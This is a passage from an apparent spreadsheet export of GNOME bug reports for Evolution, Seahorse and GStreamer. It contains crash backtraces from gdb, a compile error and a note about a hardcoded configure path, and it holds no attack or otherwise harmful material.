#0  0x00002aaaae00a8f6 in sort_node (a=0x41e01f08 b=0x41e01f10) at
camel-folder-thread.c:373
373             if (a1-&gt;order == b1-&gt;order)
(gdb) print a1
Variable a1 is not available.
(gdb) print b1
$5 = (const CamelFolderThreadNode *) 0x0
(gdb) bt
#0  0x00002aaaae00a8f6 in sort_node (a=0x41e01f08 b=0x41e01f10) at
camel-folder-thread.c:373
#1  0x0000003280831032 in msort_with_tmp (b=Variable b is not available.
) at msort.c:56
#2  0x0000003280830f3b in msort_with_tmp (b=0x41e01ef8 n=4 s=8
cmp=0x2aaaae00a8aa 
    t=0x2aaab65d6f60 PO]\uffff\uffff*) at msort.c:48
#3  0x0000003280830f3b in msort_with_tmp (b=0x41e01ed8 n=8 s=8
cmp=0x2aaaae00a8aa 
    t=0x2aaab65d6f60 PO]\uffff\uffff*) at msort.c:48
#4  0x0000003280830f23 in msort_with_tmp (b=0x41e01ed8 n=17 s=8
cmp=0x2aaaae00a8aa 
    t=0x2aaab65d6f60 PO]\uffff\uffff*) at msort.c:47
#5  0x0000003280830f3b in msort_with_tmp (b=0x41e01e58 n=33 s=8
cmp=0x2aaaae00a8aa 
    t=0x2aaab65d6f60 PO]\uffff\uffff*) at msort.c:48
#6  0x0000003280830f3b in msort_with_tmp (b=0x41e01d58 n=65 s=8
cmp=0x2aaaae00a8aa 
    t=0x2aaab65d6f60 PO]\uffff\uffff*) at msort.c:48
#7  0x0000003280830f3b in msort_with_tmp (b=0x41e01b50 n=130 s=8
cmp=0x2aaaae00a8aa 
    t=0x2aaab65d6f60 PO]\uffff\uffff*) at msort.c:48
#8  0x0000003280830f3b in msort_with_tmp (b=0x41e01740 n=260 s=8
cmp=0x2aaaae00a8aa 
    t=0x2aaab65d6f60 PO]\uffff\uffff*) at msort.c:48
#9  0x000000328083111c in *__GI_qsort (b=0x41e01740 n=260 s=8
cmp=0x2aaaae00a8aa )
    at msort.c:154
#10 0x00002aaaae00a99a in sort_thread (cp=0x41e01fd0) at camel-folder-thread.c:405
#11 0x00002aaaae00ac37 in thread_summary (thread=0x2aaab5ffffc0
summary=0x2aaab204f280)
    at camel-folder-thread.c:519
#12 0x00002aaaae00b1f2 in camel_folder_thread_messages_new (folder=0x7018e0
uids=Variable uids is not available.
)
    at camel-folder-thread.c:632
#13 0x00002aaaae9bb086 in regen_list_regen (mm=Variable mm is not available.
) at message-list.c:3547
#14 0x00002aaaae9abdc3 in mail_msg_received (e=Variable e is not available.
) at mail-mt.c:556
#15 0x0000003852e2e0bc in thread_dispatch (din=Variable din is not available.
) at e-msgport.c:826
#16 0x000000328150697c in start_thread (arg=Variable arg is not available.
) at pthread_create.c:261
#17 0x00000032808c9c2e in ?? () from /lib64/libc.so.6
#18 0x0000000000000000 in ?? ()</t>
  </si>
  <si>
    <t>SEAHORSE-310682</t>
  </si>
  <si>
    <t>doesn't compile !WITH_KEYSERVER</t>
  </si>
  <si>
    <t>seahorse-key-manager.c: Auf hÃ¶chster Ebene:
seahorse-key-manager.c:708: Fehler: Â»search_activateÂ« ist hier nicht deklariert
(nicht in einer Funktion)
seahorse-key-manager.c:710: Fehler: Â»sync_activateÂ« ist hier nicht deklariert
(nicht in einer Funktion)
(which means that these functions are not declared)</t>
  </si>
  <si>
    <t>GSTREAMER-159847</t>
  </si>
  <si>
    <t>[build] hardcoded path for musepack headers in configure</t>
  </si>
  <si>
    <t>In the configure script in the musepack section there is this line:
CPPFLAGS=-I/usr/include/musepack $CPPFLAGS
On linux systems musepack is probably installed in the /usr/include/musepack.
So no problem here but on FreeBSD (and maybe other OS's) they are put in
/usr/local/include/musepack. With the result that the configure script can't 
find the includes. 
Because default CPPFLAGS points to /usr/local/include.</t>
  </si>
  <si>
    <t>GSTREAMER-162184</t>
  </si>
  <si>
    <t>[PATCH] [mad] crash playing a mp3 file</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 3 (Heidelberg)
Package: gnome-utils
Severity: normal
Version: GNOME2.8.0 0.8.8
Gnome-Distributor: Red Hat Inc
Synopsis: when with Rhytmbox i play an mp3 it crash...
Bugzilla-Product: gnome-utils
Bugzilla-Component: gdict
Bugzilla-Version: 0.8.8
BugBuddy-GnomeVersion: 2.0 (2.8.0)
Description:
Description of the crash:
Steps to reproduce the crash:
1.  open rhythmbox
2. play any mp3 files
3. 
Expected Results:
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/rhythmbox'
(no debugging symbols found)...Using host libthread_db library
/lib/tls/libthread_db.so.1.
(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Thread debugging using
libthread_db enabled]
[New Thread -151151872 (LWP 23941)]
[New Thread 19176368 (LWP 23947)]
[Thread debugging using libthread_db enabled]
[New Thread -151151872 (LWP 23941)]
[New Thread 19176368 (LWP 23947)]
[Thread debugging using libthread_db enabled]
[New Thread -151151872 (LWP 23941)]
[New Thread 19176368 (LWP 23947)]
[New Thread 55585712 (LWP 23945)]
[New Thread 45095856 (LWP 23944)]
[New Thread 34606000 (LWP 23943)]
[New Thread 109579184 (LWP 23942)]
0x003087a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#0  0x003087a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
#1  0x0056adbc in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
#2  0x0011e57a in ?? () from /usr/lib/libgthread-2.0.so.0
#3  0x0a0ca130 in ?? ()
#4  0x09ee07e0 in ?? ()
#5  0xfef10cc8 in ?? ()
#6  0x00e2921e in gst_debug_log (category=0xffffff92 level=4294967186
    file=0xffffff92  
    function=0xffffff92  line=-110 
    object=0xffffff92 format=0xffffff92 &lt;Address 0xffffff92 out of
bounds&gt;)
    at gstinfo.c:310
#7  0x00e4f8c5 in gst_thread_change_state (element=0xa0d17b8)
    at gstthread.c:407
#8  0x00e2204c in gst_element_set_state_func (element=0xa0d17b8 
    state=GST_STATE_PAUSED) at gstelement.c:2796
#9  0x00e12117 in gst_bin_set_state (element=0xa0d17b8 
    state=GST_STATE_PAUSED) at gstbin.c:893
#10 0x00e2155f in gst_element_set_state (element=0xa0d17b8 
    state=GST_STATE_PAUSED) at gstelement.c:2739
#11 0x080832d9 in rb_player_sync_pipeline ()
#12 0x080846a1 in rb_player_pause ()
#13 0x080688ee in rb_shell_player_stop ()
#14 0x080c01aa in __FUNCTION__.39 ()
#15 0x00000711 in ?? ()
#16 0x080c04ca in __FUNCTION__.39 ()
#17 0x00000000 in ?? ()
Thread 6 (Thread 109579184 (LWP 23942)):
#0  0x003087a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0056ab46 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x006a46b7 in g_async_queue_push () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0x006d5a87 in g_thread_pool_free () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0x006d38d2 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0x005683ae in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#6  0x00fe5b6e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 5 (Thread 34606000 (LWP 23943)):
#0  0x003087a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0056adbc in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x0011e57a in ?? () from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#3  0x09c95b90 in ?? ()
No symbol table info available.
#4  0x09e5a388 in ?? ()
No symbol table info available.
#5  0x02100348 in ?? ()
No symbol table info available.
#6  0x0011e4b1 in ?? () from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#7  0x09c95b90 in ?? ()
No symbol table info available.
#8  0x00000000 in ?? ()
No symbol table info available.
Thread 4 (Thread 45095856 (LWP 23944)):
#0  0x003087a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0056adbc in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x0011e57a in ?? () from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#3  0x09c95bc8 in ?? ()
No symbol table info available.
#4  0x09e5a350 in ?? ()
No symbol table info available.
#5  0x02b01348 in ?? ()
No symbol table info available.
#6  0x02b01348 in ?? ()
No symbol table info available.
#7  0x00f80afa in free () from /lib/tls/libc.so.6
No symbol table info available.
#8  0x006a4636 in g_async_queue_push () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x006a4a80 in g_async_queue_timed_pop () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x0809b9c3 in read_queue ()
No symbol table info available.
#11 0x0809f668 in update_thread_main ()
No symbol table info available.
#12 0x006d38d2 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#13 0x005683ae in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#14 0x00fe5b6e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 3 (Thread 55585712 (LWP 23945)):
#0  0x003087a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0056adbc in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x0011e57a in ?? () from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#3  0x09c95c00 in ?? ()
No symbol table info available.
#4  0x09e5a3c0 in ?? ()
No symbol table info available.
#5  0x03502338 in ?? ()
No symbol table info available.
#6  0x0011e4b1 in ?? () from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#7  0x09c95c00 in ?? ()
No symbol table info available.
#8  0x00000000 in ?? ()
No symbol table info available.
Thread 2 (Thread 19176368 (LWP 23947)):
#0  0x003087a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0056e42b in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x03c89f50 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x00763c08 in __udivdi3 () from /usr/lib/gstreamer-0.8/libgstmad.so
No symbol table info available.
#5  0x0075d377 in gst_mad_chain (pad=0xa105438 _data=0x9c4918c)
    at gstmad.c:1422
	consumed = 0
	time_offset = 8589934592
	before_sync = (const unsigned char *) 0xf1ce14 $[\022
	nsamples = 1152
	time_duration = 63772885610956488
	tocopy = 0
	mad_input_buffer = (
    guchar *) 0xa10bdba
ÃƒÂ¿ÃƒÂ»Ã‚Â²D#\217\224\026~ÃƒÂ„\001ÃƒÂ¥p\201ÃƒÂ¯ÃƒÂ¨\200&lt;Ã‚Âªn\017YÃƒÂ½\022\a\224ÃƒÂ­ÃƒÂ‚\003Ã‚Â¾ÃƒÂ¤1Ã‚Â¬\tÃ‚Â¹?ÃƒÂ´ÃƒÂ¿Ã‚Â§m?Ã‚Â®ÃƒÂ—\234ÃƒÂ¨aÃƒÂŒ\210bÃƒÂ(j\220\(pÃ‚Â¨jLÃ‚Â¨\226Dj\206\rGB\ÃƒÂ€Ã‚Â´`n-\033\213B!$\006
	mad = (GstMad *) 0xa106198
	data = (
    gchar *) 0xa10eeb7 ÃƒÂ¿P.pÃ‚Â¨uÃƒÂ±
8ÃƒÂ“ÃƒÂ‹HÃ‚Â¯ÃƒÂ¿ÃƒÂ¿ÃƒÂ¿ÃƒÂ¿ÃƒÂ¿ÃƒÂ¿ÃƒÂ¿ÃƒÂ¿\227Ã‚Â§Ã‚Â°\236pÃ‚Â°\031Qg\020\002ÃƒÂŒ\004\005L\217bL\212ÃƒÂ \rÃƒÂJ\fÃƒÂŽ~LH~LC+M\037\032\214+\rÃƒÂ‚\001d\002\237ÃƒÂ˜\003d\036ÃƒÂ¬ÃƒÂ˜|\204\225ÃƒÂ¾\200i\230\234&lt;ÃƒÂ±5ÃƒÂ¦\206ÃƒÂ£ÃƒÂŠQu\f\\Ã‚ÂµÃƒÂ´Ã‚Â¹E\031\200z8*ÃƒÂ¥z~ÃƒÂ§\031Ã‚Â¤(ZÃ‚Â¼\226ÃƒÂœ\033OÃ‚Â»GÃƒÂˆÃƒÂ–\030p\031ÃƒÂ§P\020YÃƒÂŸÃƒÂ¿ÃƒÂ¿ÃƒÂ¿ÃƒÂ¿ÃƒÂ¿ÃƒÂ¿ÃƒÂ¿ÃƒÂ½ÃƒÂ®ÃƒÂ¨\037@\230\230ÃƒÂ \203\202\221p)Ã‚Â ÃƒÂ€\026
\rÃƒÂ
	size = 1529
	new_pts = 0
	timestamp = 18446744073709551615
	__PRETTY_FUNCTION__ = gst_mad_chain
#6  0x00e3a53c in gst_pad_call_chain_function (pad=0xa105438
data=0x9c4918c)
    at gstpad.c:4430
	link = (GstPadLink *) 0x5
	__PRETTY_FUNCTION__ = gst_pad_call_chain_function
#7  0x00e36e06 in gst_pad_push (pad=0xa105500 data=0x9c4918c)
    at gstpad.c:3241
	peer = (GstRealPad *) 0xa105438
	__PRETTY_FUNCTION__ = gst_pad_push
#8  0x00761b59 in gst_id3_tag_chain (pad=0xa103cb8 data=0x9c49274)
    at gstid3tag.c:1254
	merged = (GstTagList *) 0x9c4918c
	id3 = (struct id3_tag *) 0x0
	tag = (GstID3Tag *) 0xa103cb8
	buffer = (GstBuffer *) 0x9c4918c
	__PRETTY_FUNCTION__ = gst_id3_tag_chain
#9  0x00e3a53c in gst_pad_call_chain_function (pad=0xa103df8
data=0x9c49274)
    at gstpad.c:4430
	link = (GstPadLink *) 0x5
	__PRETTY_FUNCTION__ = gst_pad_call_chain_function
#10 0x00e36e06 in gst_pad_push (pad=0xa0df3d8 data=0x9c49274)
    at gstpad.c:3241
	peer = (GstRealPad *) 0xa103df8
	__PRETTY_FUNCTION__ = gst_pad_push
#11 0x00415579 in gst_spider_identity_chain (pad=0x5 buf=0x9c49274)
    at gstspideridentity.c:222
	__t = 1
	__r = 1
	ident = (GstSpiderIdentity *) 0xa0df0a8
	__PRETTY_FUNCTION__ = gst_spider_identity_chain
#12 0x001c06fc in loop_group_schedule_function (argc=0 argv=0xa0df868)
    at gstoptimalscheduler.c:1332
	entry = (GstElement *) 0xa0df0a8
	__PRETTY_FUNCTION__ = loop_group_schedule_function
#13 0x001c030f in gst_opt_scheduler_schedule_run_queue
(osched=0xa0c8c30 
    only_group=0xa0df868) at gstoptimalscheduler.c:1154
	e = (GstElement *) 0xa0df0a8
	l = (GSList *) 0x0
	lcopy = (GSList *) 0xa0393e8
	__PRETTY_FUNCTION__ = gst_opt_scheduler_schedule_run_queue
#14 0x001c0d43 in gst_opt_scheduler_get_wrapper (srcpad=0xa105658)
    at gstoptimalscheduler.c:1451
	data = (GstData *) 0xa0ea348
	group = (GstOptSchedulerGroup *) 0xa0df868
	osched = (GstOptScheduler *) 0xa0c8c30
	disabled = 15850736
	__PRETTY_FUNCTION__ = gst_opt_scheduler_get_wrapper
#15 0x00e372f0 in gst_pad_pull (pad=0xa0ea348) at gstpad.c:3296
	link = (GstPadLink *) 0xa105ac8
	peer = (GstRealPad *) 0xa105658
	data = (GstData *) 0x1
	__PRETTY_FUNCTION__ = gst_pad_pull
#16 0x004164dc in gst_spider_identity_dumb_loop (ident=0x9c549f0)
    at gstspideridentity.c:448
	__t = 1
	__r = 1
	buf = (GstBuffer *) 0x0
	__PRETTY_FUNCTION__ = gst_spider_identity_dumb_loop
#17 0x001c06fc in loop_group_schedule_function (argc=0 argv=0xa0ea450)
    at gstoptimalscheduler.c:1332
	entry = (GstElement *) 0x9c549f0
	__PRETTY_FUNCTION__ = loop_group_schedule_function
#18 0x001c030f in gst_opt_scheduler_schedule_run_queue
(osched=0xa0c8c30 
    only_group=0xa0ea450) at gstoptimalscheduler.c:1154
	e = (GstElement *) 0x9c549f0
	l = (GSList *) 0x0
	lcopy = (GSList *) 0xa0393c8
	__PRETTY_FUNCTION__ = gst_opt_scheduler_schedule_run_queue
#19 0x001c0d43 in gst_opt_scheduler_get_wrapper (srcpad=0xa0e7500)
    at gstoptimalscheduler.c:1451
	data = (GstData *) 0xa0e9008
	group = (GstOptSchedulerGroup *) 0xa0ea450
	osched = (GstOptScheduler *) 0xa0c8c30
	disabled = 15850736
	__PRETTY_FUNCTION__ = gst_opt_scheduler_get_wrapper
#20 0x00e372f0 in gst_pad_pull (pad=0xa0e9008) at gstpad.c:3296
	link = (GstPadLink *) 0xa0ee2e0
	peer = (GstRealPad *) 0xa0e7500
	data = (GstData *) 0x74e8f4
	__PRETTY_FUNCTION__ = gst_pad_pull
#21 0x007489b7 in gst_alsa_sink_loop (element=0xa0ea590) at
gstalsasink.c:378
	samples = 1857726
	size = 168732756
	avail = 0
	avail2 = 1
	copied = 1
	sample_diff = 1864944
	max_discont = 4
	samplestamp = 166296664
	expected = 0
	i = 0
	bytes = 2147483647
	this = (GstAlsa *) 0xa0ea590
	sink = (GstAlsaSink *) 0xa0ea590
	__PRETTY_FUNCTION__ = gst_alsa_sink_loop
#22 0x001c06fc in loop_group_schedule_function (argc=0 argv=0x9c526c8)
    at gstoptimalscheduler.c:1332
	entry = (GstElement *) 0xa0ea590
	__PRETTY_FUNCTION__ = loop_group_schedule_function
#23 0x001c030f in gst_opt_scheduler_schedule_run_queue
(osched=0xa0c8c30 
    only_group=0x0) at gstoptimalscheduler.c:1154
	e = (GstElement *) 0xa0ea590
	l = (GSList *) 0x0
	lcopy = (GSList *) 0xa039350
	__PRETTY_FUNCTION__ = gst_opt_scheduler_schedule_run_queue
#24 0x001c50bd in gst_opt_scheduler_iterate (sched=0xa0c8c30)
    at gstoptimalscheduler.c:1258
	chain = (GstOptSchedulerChain *) 0xa0e76b8
	scheduled = 163915464
	chains = (GSList *) 0xa039198
	state = 163915464
	osched = (GstOptScheduler *) 0xa0c8c30
	iterations = 1
	__PRETTY_FUNCTION__ = gst_opt_scheduler_iterate
#25 0x00e45779 in gst_scheduler_iterate (sched=0xa0c8c30)
    at gstscheduler.c:738
	sclass = (GstSchedulerClass *) 0x1
	res = 0
	__PRETTY_FUNCTION__ = gst_scheduler_iterate
#26 0x00e1315d in gst_bin_iterate_func (bin=0xa0d17b8) at gstbin.c:1220
	state = GST_SCHEDULER_STATE_RUNNING
	sched = (GstScheduler *) 0xa0c8c30
	__PRETTY_FUNCTION__ = gst_bin_iterate_func
#27 0x00e5f0b9 in gst_marshal_BOOLEAN__VOID (closure=0x9c3e260 
    return_value=0x12490b0 n_param_values=1 param_values=0x1 
    invocation_hint=0x12490d8 marshal_data=0xe130c0) at
gstmarshal.c:509
	callback = 0
	data1 = 0xa0d17b8
	data2 = 0x1
	v_return = 1
	__PRETTY_FUNCTION__ = gst_marshal_BOOLEAN__VOID
#28 0x008146b2 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0x00814347 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#30 0x0082a646 in g_signal_has_handler_pending ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#31 0x0082b913 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#32 0x0082bf5a in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#33 0x00e1335c in gst_bin_iterate (bin=0xa0d17b8) at gstbin.c:1280
	__t = 1
	__r = 1
	running = 0
	__PRETTY_FUNCTION__ = gst_bin_iterate
#34 0x00e50b04 in gst_thread_main_loop (arg=0xa0d17b8) at
gstthread.c:671
	status = 1
	thread = (GstThread *) 0xa0d17b8
	element = (GstElement *) 0xa0d17b8
	sched = (GstScheduler *) 0x1
	__PRETTY_FUNCTION__ = gst_thread_main_loop
#35 0x006d38d2 in g_static_private_free () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#36 0x005683ae in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#37 0x00fe5b6e in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread -151151872 (LWP 23941)):
#0  0x003087a2 in _dl_sysinfo_int80 () from /lib/ld-linux.so.2
No symbol table info available.
#1  0x0056adbc in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x0011e57a in ?? () from /usr/lib/libgthread-2.0.so.0
No symbol table info available.
#3  0x0a0ca130 in ?? ()
No symbol table info available.
#4  0x09ee07e0 in ?? ()
No symbol table info available.
#5  0xfef10cc8 in ?? ()
No symbol table info available.
#6  0x00e2921e in gst_debug_log (category=0xffffff92 level=4294967186
    file=0xffffff92  
    function=0xffffff92  line=-110 
    object=0xffffff92 format=0xffffff92 &lt;Address 0xffffff92 out of
bounds&gt;)
    at gstinfo.c:310
No locals.
#7  0x00e4f8c5 in gst_thread_change_state (element=0xa0d17b8)
    at gstthread.c:407
	tv = {tv_sec = 1103915880 tv_usec = 96507}
	thread = (GstThread *) 0xa0d17b8
	ret = 168599856
	transition = -110
	is_self = 0
	__PRETTY_FUNCTION__ = gst_thread_change_state
#8  0x00e2204c in gst_element_set_state_func (element=0xa0d17b8 
    state=GST_STATE_PAUSED) at gstelement.c:2796
	oclass = (GstElementClass *) 0x9c3ef20
	curpending = GST_STATE_PAUSED
	return_val = GST_STATE_SUCCESS
	__PRETTY_FUNCTION__ = gst_element_set_state_func
#9  0x00e12117 in gst_bin_set_state (element=0xa0d17b8 
    state=GST_STATE_PAUSED) at gstbin.c:893
	bin = (GstBin *) 0xa0d17b8
#10 0x00e2155f in gst_element_set_state (element=0xa0d17b8 
    state=GST_STATE_PAUSED) at gstelement.c:2739
	klass = (GstElementClass *) 0x9c3ef20
	ret = 163835680
	__PRETTY_FUNCTION__ = gst_element_set_state
#11 0x080832d9 in rb_player_sync_pipeline ()
No symbol table info available.
#12 0x080846a1 in rb_player_pause ()
No symbol table info available.
#13 0x080688ee in rb_shell_player_stop ()
No symbol table info available.
#14 0x080c01aa in __FUNCTION__.39 ()
No symbol table info available.
#15 0x00000711 in ?? ()
No symbol table info available.
#16 0x080c04ca in __FUNCTION__.39 ()
No symbol table info available.
#17 0x00000000 in ?? ()
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-12-24 14:20 -------
Unknown version 0.8.8 in product gnome-utils.  Setting version to unspecified.
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product gnome-utils.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was simo.ragnetti@gmail.com.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>simo.ragnetti</t>
  </si>
  <si>
    <t>EVOLUTION-240619</t>
  </si>
  <si>
    <t>Evo crashes when entering the settings</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.2.0
Synopsis: Evo crashes when entering the settings
Bugzilla-Product: Evolution
Bugzilla-Component: Shell
Description:
Description of Problem:
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen?
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-mail'
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...[New
Thread 8192 (LWP 3989)]
[New Thread 16385 (LWP 4044)]
[New Thread 8194 (LWP 4045)]
[New Thread 16387 (LWP 4046)]
[New Thread 24580 (LWP 4049)]
0x420ae169 in wait4 () from /lib/i686/libc.so.6
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4045ec63 in waitpid () from /lib/i686/libpthread.so.0
#3  0x40c228bd in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#4  0x080aecf9 in message_browser_get_type ()
#5  0x4046047e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#6  
#7  0x0808c204 in mail_composer_prefs_new_signature ()
#8  0x0808c3ad in mail_composer_prefs_new_signature ()
#9  0x0808c80f in mail_composer_prefs_new_signature ()
#10 0x0808cdfa in mail_composer_prefs_new ()
#11 0x08093303 in evolution_mail_config_wizard_init ()
#12 0x402fb6f5 in bonobo_generic_factory_new_generic (factory=0x81a4e88
    oaf_iid=0x814e0c0
OAFIID:GNOME_Evolution_Mail_ComposerPrefs_ConfigControl) at
bonobo-generic-factory.c:261
#13 0x402fb172 in impl_Bonobo_ObjectFactory_create_object
(servant=0x81a4b38 
    obj_oaf_iid=0x814e0c0
OAFIID:GNOME_Evolution_Mail_ComposerPrefs_ConfigControl
params=0xbffff4f0 ev=0xbffff570) at bonobo-generic-factory.c:56
#14 0x40d9558e in _ORBIT_skel_GNOME_ObjectFactory_create_object ()
   from /usr/lib/liboaf.so.0
#15 0x40dd5a1c in ORBit_POA_handle_request () from
/usr/lib/libORBit.so.0
#16 0x40dd85f9 in ORBit_handle_incoming_request () from
/usr/lib/libORBit.so.0
#17 0x40df0f7b in giop_main_handle_connection () from
/usr/lib/libIIOP.so.0
#18 0x40d93bcc in orb_handle_connection () from /usr/lib/liboaf.so.0
#19 0x40fb9076 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#20 0x40fba97e in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#21 0x40fbae59 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#22 0x40fbb0f4 in g_main_run () from /usr/lib/libglib-1.2.so.0
#23 0x40eb96df in gtk_main () from /usr/lib/libgtk-1.2.so.0
#24 0x402fc53b in bonobo_main () at bonobo-main.c:284
#25 0x080aef84 in main ()
#26 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
Thread 5 (Thread 24580 (LWP 4049)):
#0  0x42028d69 in sigsuspend () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4045c108 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4045904b in pthread_cond_wait () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x401a5e9e in e_msgport_wait () from
/usr/lib/evolution/1.2/libeutil.so.0
No symbol table info available.
#4  0x401a6608 in e_thread_busy () from
/usr/lib/evolution/1.2/libeutil.so.0
No symbol table info available.
#5  0x4045a941 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 16387 (LWP 4046)):
#0  0x42028d69 in sigsuspend () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4045c108 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4045904b in pthread_cond_wait () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x401a5e9e in e_msgport_wait () from
/usr/lib/evolution/1.2/libeutil.so.0
No symbol table info available.
#4  0x401a6608 in e_thread_busy () from
/usr/lib/evolution/1.2/libeutil.so.0
No symbol table info available.
#5  0x4045a941 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 8194 (LWP 4045)):
#0  0x42028d69 in sigsuspend () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4045c108 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4045904b in pthread_cond_wait () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x401a5e9e in e_msgport_wait () from
/usr/lib/evolution/1.2/libeutil.so.0
No symbol table info available.
#4  0x401a6608 in e_thread_busy () from
/usr/lib/evolution/1.2/libeutil.so.0
No symbol table info available.
#5  0x4045a941 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 16385 (LWP 4044)):
#0  0x420d224b in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x40459d9e in __pthread_manager () from /lib/i686/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 8192 (LWP 3989)):
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4045ec63 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x40c228bd in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x080aecf9 in message_browser_get_type ()
No symbol table info available.
#5  0x4046047e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  
No symbol table info available.
#7  0x0808c204 in mail_composer_prefs_new_signature ()
No symbol table info available.
#8  0x0808c3ad in mail_composer_prefs_new_signature ()
No symbol table info available.
#9  0x0808c80f in mail_composer_prefs_new_signature ()
No symbol table info available.
#10 0x0808cdfa in mail_composer_prefs_new ()
No symbol table info available.
#11 0x08093303 in evolution_mail_config_wizard_init ()
No symbol table info available.
#12 0x402fb6f5 in bonobo_generic_factory_new_generic (factory=0x81a4e88
    oaf_iid=0x814e0c0
OAFIID:GNOME_Evolution_Mail_ComposerPrefs_ConfigControl) at
bonobo-generic-factory.c:261
	factory = (BonoboGenericFactory *) 0x814e0f8
#13 0x402fb172 in impl_Bonobo_ObjectFactory_create_object
(servant=0x81a4b38 
    obj_oaf_iid=0x814e0c0
OAFIID:GNOME_Evolution_Mail_ComposerPrefs_ConfigControl
params=0xbffff4f0 ev=0xbffff570) at bonobo-generic-factory.c:56
	servant = 0x81a4e88
	class = (BonoboGenericFactoryClass *) 0xfffffe00
